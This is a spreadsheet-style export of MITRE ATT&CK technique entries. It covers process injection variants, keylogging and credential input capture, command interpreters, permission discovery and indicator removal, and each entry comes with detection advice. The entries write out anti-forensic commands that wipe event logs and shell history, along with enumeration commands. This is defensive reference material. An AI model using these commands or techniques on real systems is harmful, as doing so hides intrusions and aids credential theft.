Adversaries may abuse TxF to a perform a file-less variation of [Process Injection](https://attack.mitre.org/techniques/T1055). Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), process doppelgänging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process doppelgänging's use of TxF also avoids the use of highly-monitored API functions such as &lt;code&gt;NtUnmapViewOfSection&lt;/code&gt;, &lt;code&gt;VirtualProtectEx&lt;/code&gt;, and &lt;code&gt;SetThreadContext&lt;/code&gt;. (Citation: BlackHat Process Doppelgänging Dec 2017)
Process Doppelgänging is implemented in 4 steps (Citation: BlackHat Process Doppelgänging Dec 2017):
* Transact – Create a TxF transaction using a legitimate executable then overwrite the file with malicious code. These changes will be isolated and only visible within the context of the transaction.
* Load – Create a shared section of memory and load the malicious executable.
* Rollback – Undo changes to original executable, effectively removing malicious code from the file system.
* Animate – Create a process from the tainted section of memory and initiate execution.
This behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process doppelgänging may evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055/013</t>
  </si>
  <si>
    <t>Monitor and analyze calls to &lt;code&gt;CreateTransaction&lt;/code&gt;, &lt;code&gt;CreateFileTransacted&lt;/code&gt;, &lt;code&gt;RollbackTransaction&lt;/code&gt;, and other rarely used functions indicative of TxF activity. Process Doppelgänging also invokes an outdated and undocumented implementation of the Windows process loader via calls to &lt;code&gt;NtCreateProcessEx&lt;/code&gt; and &lt;code&gt;NtCreateThreadEx&lt;/code&gt; as well as API calls used to modify memory within another process, such as &lt;code&gt;WriteProcessMemory&lt;/code&gt;. (Citation: BlackHat Process Doppelgänging Dec 2017) (Citation: hasherezade Process Doppelgänging Dec 2017)
Scan file objects reported during the PsSetCreateProcessNotifyRoutine, (Citation: Microsoft PsSetCreateProcessNotifyRoutine routine) which triggers a callback whenever a process is created or deleted, specifically looking for file objects with enabled write access. (Citation: BlackHat Process Doppelgänging Dec 2017) Also consider comparing file objects loaded in memory to the corresponding file on disk. (Citation: hasherezade Process Doppelgänging Dec 2017)
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior.</t>
  </si>
  <si>
    <t>Process Injection: VDSO Hijacking</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject malicious code into processes via VDSO hijacking in order to evade process-based defenses as well as possibly elevate privileges. Virtual dynamic shared object (vdso) hijacking is a method of executing arbitrary code in the address space of a separate live process. 
VDSO hijacking involves redirecting calls to dynamically linked shared libraries. Memory protections may prevent writing executable code to a process via [Ptrace System Calls](https://attack.mitre.org/techniques/T1055/008). However, an adversary may hijack the syscall interface code stubs mapped into a process from the vdso shared object to execute syscalls to open and map a malicious shared object. This code can then be invoked by redirecting the execution flow of the process via patched memory address references stored in a process' global offset table (which store absolute addresses of mapped library functions).(Citation: ELF Injection May 2009) (Citation: Backtrace VDSO) (Citation: VDSO Aug 2005) (Citation: Syscall 2014)
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via VDSO hijacking may also evade detection from security products since the execution is masked under a legitimate process.  </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055/014</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for malicious usage of system calls, such as ptrace and mmap, that can be used to attach to, manipulate memory, then redirect a processes' execution path.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Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. </t>
  </si>
  <si>
    <t>Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004)) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. [Web Portal Capture](https://attack.mitre.org/techniques/T1056/003)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1056</t>
  </si>
  <si>
    <t>24 August 2021</t>
  </si>
  <si>
    <t>Collection, Credential Access</t>
  </si>
  <si>
    <t>Detection may vary depending on how input is captured but may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`, `GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke), monitoring for malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), and ensuring no unauthorized drivers or kernel modules that could indicate keylogging or API hooking are present.</t>
  </si>
  <si>
    <t>John Lambert, Microsoft Threat Intelligence Center</t>
  </si>
  <si>
    <t>Input Capture: Keylogging</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured.
Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.(Citation: Adventures of a Keystroke) Some methods include:
* Hooking API callbacks used for processing keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), this focuses solely on API functions intended for processing keystroke data.
* Reading raw keystroke data from the hardware buffer.
* Windows Registry modifications.
* Custom drivers.
* [Modify System Image](https://attack.mitre.org/techniques/T1601) may provide adversaries with hooks into the operating system of network devices to read raw keystrokes for login sessions.(Citation: Cisco Blog Legacy Device Attacks) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1056/001</t>
  </si>
  <si>
    <t>21 October 2020</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</si>
  <si>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</si>
  <si>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Input Capture: GUI Input Capture</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)).
Adversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.(Citation: OSX Malware Exploits MacKeeper) This type of prompt can be used to collect credentials via various languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware)(Citation: Spoofing credential dialogs) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015)(Citation: Spoofing credential dialogs) On Linux systems attackers may launch dialog boxes prompting users for credentials from malicious shell scripts or the command line (i.e. [Unix Shell](https://attack.mitre.org/techniques/T1059/004)).(Citation: Spoofing credential dialogs) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1056/002</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor process execution for unusual programs as well as malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) that could be used to prompt users for credentials. For example, command/script history including abnormal parameters (such as requests for credentials and/or strings related to creating password prompts) may be malicious.(Citation: Spoofing credential dialogs) 
Inspect and scrutinize input prompts for indicators of illegitimacy, such as non-traditional banners, text, timing, and/or sources. </t>
  </si>
  <si>
    <t>Matthew Molyett, @s1air, Cisco Talos</t>
  </si>
  <si>
    <t>Input Capture: Web Portal Capture</t>
  </si>
  <si>
    <t>Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
This variation on input capture may be conducted post-compromise using legitimate administrative access as a backup measure to maintain network access through [External Remote Services](https://attack.mitre.org/techniques/T1133) and [Valid Accounts](https://attack.mitre.org/techniques/T1078) or as part of the initial compromise by exploitation of the externally facing web service.(Citation: Volexity Virtual Private Keylogging)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1056/003</t>
  </si>
  <si>
    <t>File monitoring may be used to detect changes to files in the Web directory for organization login pages that do not match with authorized updates to the Web server's content.</t>
  </si>
  <si>
    <t>An externally facing login portal is configured.</t>
  </si>
  <si>
    <t>Input Capture: Credential API Hooking</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001),  this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
* **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)
* **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
* **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1056/004</t>
  </si>
  <si>
    <t>Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: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Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)</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</si>
  <si>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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1057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</si>
  <si>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</si>
  <si>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Administrator, SYSTEM may provide better process ownership details</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</si>
  <si>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 as well as utilize various [Remote Services](https://attack.mitre.org/techniques/T1021) in order to achieve remote Execution.(Citation: Powershell Remote Commands)(Citation: Cisco IOS Software Integrity Assurance - Command History)(Citation: Remote Shell Execution in Python)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1059</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</si>
  <si>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</si>
  <si>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Command and Scripting Interpreter: PowerShell</t>
  </si>
  <si>
    <t>Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the &lt;code&gt;Start-Process&lt;/code&gt; cmdlet which can be used to run an executable and the &lt;code&gt;Invoke-Command&lt;/code&gt; cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.
A number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363),  [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack)
PowerShell commands/scripts can also be executed without directly invoking the &lt;code&gt;powershell.exe&lt;/code&gt; binary through interfaces to PowerShell's underlying &lt;code&gt;System.Management.Automation&lt;/code&gt; assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1059/001</t>
  </si>
  <si>
    <t>28 May 2021</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</si>
  <si>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t>
  </si>
  <si>
    <t>Command and Scripting Interpreter: AppleScript</t>
  </si>
  <si>
    <t>Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.
Scripts can be run from the command-line via &lt;code&gt;osascript /path/to/script&lt;/code&gt; or &lt;code&gt;osascript -e "script here"&lt;/code&gt;. Aside from the command line, scripts can be executed in numerous ways including Mail rules, Calendar.app alarms, and Automator workflows. AppleScripts can also be executed as plain text shell scripts by adding &lt;code&gt;#!/usr/bin/osascript&lt;/code&gt; to the start of the script file.(Citation: SentinelOne AppleScript)
AppleScripts do not need to call &lt;code&gt;osascript&lt;/code&gt; to execute, however. They may be executed from within mach-O binaries by using the macOS [Native API](https://attack.mitre.org/techniques/T1106)s &lt;code&gt;NSAppleScript&lt;/code&gt; or &lt;code&gt;OSAScript&lt;/code&gt;, both of which execute code independent of the &lt;code&gt;/usr/bin/osascript&lt;/code&gt; command line utility.
Adversaries may abuse AppleScript to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally), but they can interact with applications if they're already running remotely. On macOS 10.10 Yosemite and higher, AppleScript has the ability to execute [Native API](https://attack.mitre.org/techniques/T1106)s, which otherwise would require compilation and execution in a mach-O binary file format.(Citation: SentinelOne macOS Red Team). Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via [Python](https://attack.mitre.org/techniques/T1059/006).(Citation: Macro Malware Targets Macs)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1059/002</t>
  </si>
  <si>
    <t>03 August 2020</t>
  </si>
  <si>
    <t>Monitor for execution of AppleScript through &lt;code&gt;osascript&lt;/code&gt; and usage of the &lt;code&gt;NSAppleScript&lt;/code&gt; and &lt;code&gt;OSAScript&lt;/code&gt; APIs that may be related to other suspicious behavior occurring on the system.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[Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.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</si>
  <si>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Phil Stokes, SentinelOne</t>
  </si>
  <si>
    <t>Command and Scripting Interpreter: Windows Command Shell</t>
  </si>
  <si>
    <t>Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: SSH in Windows)
Batch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems.
Adversaries may leverage [cmd](https://attack.mitre.org/software/S0106) to execute various commands and payloads. Common uses include [cmd](https://attack.mitre.org/software/S0106) to execute a single command, or abusing [cmd](https://attack.mitre.org/software/S0106) interactively with input and output forwarded over a command and control channel.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1059/003</t>
  </si>
  <si>
    <t>26 July 2021</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</si>
  <si>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</si>
  <si>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Command and Scripting Interpreter: Unix Shell</t>
  </si>
  <si>
    <t>Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.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[SSH](https://attack.mitre.org/techniques/T1021/004). Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1059/004</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</si>
  <si>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</si>
  <si>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Command and Scripting Interpreter: Visual Basic</t>
  </si>
  <si>
    <t>Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)
Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript)
Adversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1059/005</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</si>
  <si>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</si>
  <si>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Command and Scripting Interpreter: Python</t>
  </si>
  <si>
    <t>Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the &lt;code&gt;python.exe&lt;/code&gt; interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables.
Python comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1059/006</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</si>
  <si>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</si>
  <si>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Python is installed.</t>
  </si>
  <si>
    <t>Command and Scripting Interpreter: JavaScript</t>
  </si>
  <si>
    <t>Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)
JScript is the Microsoft implementation of the same scripting standard. JScript is interpreted via the Windows Script engine and thus integrated with many components of Windows such as the [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and Internet Explorer HTML Application (HTA) pages.(Citation: JScrip May 2018)(Citation: Microsoft JScript 2007)(Citation: Microsoft Windows Scripts)
JavaScript for Automation (JXA) is a macOS scripting language based on JavaScript, included as part of Apple’s Open Scripting Architecture (OSA), that was introduced in OSX 10.10. Apple’s OSA provides scripting capabilities to control applications, interface with the operating system, and bridge access into the rest of Apple’s internal APIs. As of OSX 10.10, OSA only supports two languages, JXA and [AppleScript](https://attack.mitre.org/techniques/T1059/002). Scripts can be executed via the command line utility &lt;code&gt;osascript&lt;/code&gt;, they can be compiled into applications or script files via &lt;code&gt;osacompile&lt;/code&gt;, and they can be compiled and executed in memory of other programs by leveraging the OSAKit Framework.(Citation: Apple About Mac Scripting 2016)(Citation: SpecterOps JXA 2020)(Citation: SentinelOne macOS Red Team)(Citation: Red Canary Silver Sparrow Feb2021)(Citation: MDSec macOS JXA and VSCode)
Adversaries may abuse various implementations of JavaScript to execute various behaviors. Common uses include hosting malicious scripts on websites as part of a [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) or downloading and executing these script files as secondary payloads. Since these payloads are text-based, it is also very common for adversaries to obfuscate their content as part of [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1059/007</t>
  </si>
  <si>
    <t>23 June 2020</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</si>
  <si>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</si>
  <si>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Cody Thomas, SpecterOps</t>
  </si>
  <si>
    <t>Command and Scripting Interpreter: Network Device CLI</t>
  </si>
  <si>
    <t>Adversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious command and payloads. The CLI is the primary means through which users and administrators interact with the device in order to view system information, modify device operations, or perform diagnostic and administrative functions. CLIs typically contain various permission levels required for different commands. 
Scripting interpreters automate tasks and extend functionality beyond the command set included in the network OS. The CLI and scripting interpreter are accessible through a direct console connection, or through remote means, such as telnet or [SSH](https://attack.mitre.org/techniques/T1021/004).
Adversaries can use the network CLI to change how network devices behave and operate. The CLI may be used to manipulate traffic flows to intercept or manipulate data, modify startup configuration parameters to load malicious system software, or to disable security features or logging to avoid detection. (Citation: Cisco Synful Knock Evolution)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1059/008</t>
  </si>
  <si>
    <t>20 October 2020</t>
  </si>
  <si>
    <t>Consider reviewing command history in either the console or as part of the running memory to determine if unauthorized or suspicious commands were used to modify device configuration.(Citation: Cisco IOS Software Integrity Assurance - Command History)
Consider comparing a copy of the network device configuration against a known-good version to discover unauthorized changes to the command interpreter. The same process can be accomplished through a comparison of the run-time memory, though this is non-trivial and may require assistance from the vendor.</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</si>
  <si>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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1068</t>
  </si>
  <si>
    <t>Privilege Escalation</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</si>
  <si>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</si>
  <si>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Idan Revivo, @idanr86, Team Nautilus Aqua Security; Joas Antonio dos Santos, @C0d3Cr4zy, Inmetrics; Yaniv Agman, @AgmanYaniv, Team Nautilus Aqua Security</t>
  </si>
  <si>
    <t>Adversaries may attempt to find group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1069</t>
  </si>
  <si>
    <t>2.4</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</si>
  <si>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container logs for commands and/or API calls related to listing permissions for pods and nodes, such as &lt;code&gt;kubectl auth can-i&lt;/code&gt;.(Citation: K8s Authorization Overview)</t>
  </si>
  <si>
    <t>Azure AD, Containers, Google Workspace, IaaS, Linux, Office 365, SaaS, Windows, macOS</t>
  </si>
  <si>
    <t>Daniel Prizmant, Palo Alto Networks; Microsoft Threat Intelligence Center (MSTIC); Yuval Avrahami, Palo Alto Networks</t>
  </si>
  <si>
    <t>Permission Groups Discovery: Local Groups</t>
  </si>
  <si>
    <t>Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
Commands such as &lt;code&gt;net localgroup&lt;/code&gt; of the [Net](https://attack.mitre.org/software/S0039) utility, &lt;code&gt;dscl . -list /Groups&lt;/code&gt; on macOS, and &lt;code&gt;groups&lt;/code&gt; on Linux can list local groups.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1069/001</t>
  </si>
  <si>
    <t>12 March 2020</t>
  </si>
  <si>
    <t>Permission Groups Discovery: Domain Groups</t>
  </si>
  <si>
    <t>Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.
Commands such as &lt;code&gt;net group /domain&lt;/code&gt; of the [Net](https://attack.mitre.org/software/S0039) utility,  &lt;code&gt;dscacheutil -q group&lt;/code&gt; on macOS, and &lt;code&gt;ldapsearch&lt;/code&gt; on Linux can list domain-level groups.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1069/002</t>
  </si>
  <si>
    <t>Permission Groups Discovery: Cloud Groups</t>
  </si>
  <si>
    <t>Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.
With authenticated access there are several tools that can be used to find permissions groups. The &lt;code&gt;Get-MsolRole&lt;/code&gt; PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts (Citation: Microsoft Msolrole)(Citation: GitHub Raindance).
Azure CLI (AZ CLI) and the Google Cloud Identity Provider API also provide interfaces to obtain permissions groups. The command &lt;code&gt;az ad user get-member-groups&lt;/code&gt; will list groups associated to a user account for Azure while the API endpoint &lt;code&gt;GET https://cloudidentity.googleapis.com/v1/groups&lt;/code&gt; lists group resources available to a user for Google (Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)(Citation: Google Cloud Identity API Documentation).
Adversaries may attempt to list ACLs for objects to determine the owner and other accounts with access to the object, for example, via the AWS &lt;code&gt;GetBucketAcl&lt;/code&gt; API (Citation: AWS Get Bucket ACL). Using this information an adversary can target accounts with permissions to a given object or leverage accounts they have already compromised to access the object.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1069/003</t>
  </si>
  <si>
    <t>25 June 2021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</si>
  <si>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Activity and account logs for the cloud services can also be monitored for suspicious commands that are anomalous compared to a baseline of normal activity.</t>
  </si>
  <si>
    <t>Azure AD, Google Workspace, IaaS, Office 365, SaaS</t>
  </si>
  <si>
    <t>Isif Ibrahima; Regina Elwell</t>
  </si>
  <si>
    <t>Adversaries may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware. Locations and format of logs are platform or product-specific, however standard operating system logs are captured as Windows events or Linux/macOS files such as [Bash History](https://attack.mitre.org/techniques/T1552/003) and /var/log/*.
These actions may interfere with event collection, reporting, or other notifications used to detect intrusion activity. This may compromise the integrity of security solutions by causing notable events to go unreported. This activity may also impede forensic analysis and incident response, due to lack of sufficient data to determine what occurred.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1070</t>
  </si>
  <si>
    <t>File system monitoring may be used to detect improper deletion or modification of indicator files.  Events not stored on the file system may require different detection mechanisms.</t>
  </si>
  <si>
    <t>Brad Geesaman, @bradgeesaman; Ed Williams, Trustwave, SpiderLabs</t>
  </si>
  <si>
    <t>Anti-virus, Host intrusion prevention systems, Log analysis</t>
  </si>
  <si>
    <t>Indicator Removal on Host: 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</si>
  <si>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
The event logs can be cleared with the following utility commands:
* &lt;code&gt;wevtutil cl system&lt;/code&gt;
* &lt;code&gt;wevtutil cl application&lt;/code&gt;
* &lt;code&gt;wevtutil cl security&lt;/code&gt;
These logs may also be cleared through other mechanisms, such as the event viewer GUI or [PowerShell](https://attack.mitre.org/techniques/T1059/001).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1070/001</t>
  </si>
  <si>
    <t>28 January 2020</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</si>
  <si>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</si>
  <si>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Clearing the Windows event logs requires Administrator permissions</t>
  </si>
  <si>
    <t>Anti Virus, Host Intrusion Prevention Systems, Log Analysis</t>
  </si>
  <si>
    <t>Indicator Removal on Host: Clear Linux or Mac System Logs</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the &lt;code&gt;/var/log/&lt;/code&gt; directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)
* &lt;code&gt;/var/log/messages:&lt;/code&gt;: General and system-related messages
* &lt;code&gt;/var/log/secure&lt;/code&gt; or &lt;code&gt;/var/log/auth.log&lt;/code&gt;: Authentication logs
* &lt;code&gt;/var/log/utmp&lt;/code&gt; or &lt;code&gt;/var/log/wtmp&lt;/code&gt;: Login records
* &lt;code&gt;/var/log/kern.log&lt;/code&gt;: Kernel logs
* &lt;code&gt;/var/log/cron.log&lt;/code&gt;: Crond logs
* &lt;code&gt;/var/log/maillog&lt;/code&gt;: Mail server logs
* &lt;code&gt;/var/log/httpd/&lt;/code&gt;: Web server access and error logs
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1070/002</t>
  </si>
  <si>
    <t>File system monitoring may be used to detect improper deletion or modification of indicator files. Also monitor for suspicious processes interacting with log files.</t>
  </si>
  <si>
    <t>Indicator Removal on Host: Clear Command History</t>
  </si>
  <si>
    <t>In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.
On Linux and macOS, these command histories can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable &lt;code&gt;HISTFILE&lt;/code&gt;. When a user logs off a system, this information is flushed to a file in the user's home directory called &lt;code&gt;~/.bash_history&lt;/code&gt;. The benefit of this is that it allows users to go back to commands they've used before in different sessions.
Adversaries may delete their commands from these logs by manually clearing the history (&lt;code&gt;history -c&lt;/code&gt;) or deleting the bash history file &lt;code&gt;rm ~/.bash_history&lt;/code&gt;.
On Windows hosts, PowerShell has two different command history providers: the built-in history and the command history managed by the &lt;code&gt;PSReadLine&lt;/code&gt; module. The built-in history only tracks the commands used in the current session. This command history is not available to other sessions and is deleted when the session ends.
The &lt;code&gt;PSReadLine&lt;/code&gt; command history tracks the commands used in all PowerShell sessions and writes them to a file (&lt;code&gt;$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt&lt;/code&gt; by default). This history file is available to all sessions and contains all past history since the file is not deleted when the session ends.(Citation: Microsoft PowerShell Command History)
Adversaries may run the PowerShell command &lt;code&gt;Clear-History&lt;/code&gt; to flush the entire command history from a current PowerShell session. This, however, will not delete/flush the &lt;code&gt;ConsoleHost_history.txt&lt;/code&gt; file. Adversaries may also delete the &lt;code&gt;ConsoleHost_history.txt&lt;/code&gt; file or edit its contents to hide PowerShell commands they have run.(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1070/003</t>
  </si>
  <si>
    <t>31 January 2020</t>
  </si>
  <si>
    <t>16 October 2020</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</si>
  <si>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</si>
  <si>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Emile Kenning, Sophos; Vikas Singh, Sophos</t>
  </si>
  <si>
    <t>Host forensic analysis, Log analysis</t>
  </si>
  <si>
    <t>Indicator Removal on Host: File Deletion</t>
  </si>
  <si>
    <t>Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
